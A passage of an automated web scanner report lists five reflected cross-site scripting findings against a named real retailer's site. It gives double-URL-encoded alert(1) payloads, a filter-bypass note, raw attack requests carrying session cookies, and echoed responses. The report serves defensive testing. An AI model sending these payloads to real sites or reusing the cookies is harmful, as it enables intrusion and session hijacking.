Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:37 GMT
Content-Length: 28980
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrichdced1";alert(1)//7cc06b185b3/images/homepage-slider/november-2010/jai-memoriam","E404") ;
   </script>
...[SNIP]...

1.446. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bab2b%2522%253balert%25281%2529%252f%252fdc19e05231 was submitted in the REST URL parameter 4. This input was echoed as bab2b";alert(1)//dc19e05231 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/imagesbab2b%2522%253balert%25281%2529%252f%252fdc19e05231/homepage-slider/november-2010/jai-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:39 GMT
Content-Length: 28979
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/imagesbab2b";alert(1)//dc19e05231/homepage-slider/november-2010/jai-memoriam","E404") ;
   </script>
...[SNIP]...

1.447. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad572%2522%253balert%25281%2529%252f%252ffd10c518c1 was submitted in the REST URL parameter 5. This input was echoed as ad572";alert(1)//fd10c518c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/homepage-sliderad572%2522%253balert%25281%2529%252f%252ffd10c518c1/november-2010/jai-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:41 GMT
Content-Length: 28979
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/homepage-sliderad572";alert(1)//fd10c518c1/november-2010/jai-memoriam","E404") ;
   </script>
...[SNIP]...

1.448. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2353%2522%253balert%25281%2529%252f%252ff0067656cbf was submitted in the REST URL parameter 6. This input was echoed as d2353";alert(1)//f0067656cbf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010d2353%2522%253balert%25281%2529%252f%252ff0067656cbf/jai-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:43 GMT
Content-Length: 28980
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010d2353";alert(1)//f0067656cbf/jai-memoriam","E404") ;
   </script>
...[SNIP]...

1.449. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dbdf%2522%253balert%25281%2529%252f%252f24b72a3206 was submitted in the REST URL parameter 7. This input was echoed as 1dbdf";alert(1)//24b72a3206 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam1dbdf%2522%253balert%25281%2529%252f%252f24b72a3206 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:45 GMT
Content-Length: 28979
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam1dbdf";alert(1)//24b72a3206","E404") ;
   </script>
...[SNIP]...

1.450. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30a98%2522%253balert%25281%2529%252f%252f3d567e605d9 was submitted in the REST URL parameter 1. This input was echoed as 30a98";alert(1)//3d567e605d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc30a98%2522%253balert%25281%2529%252f%252f3d567e605d9/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
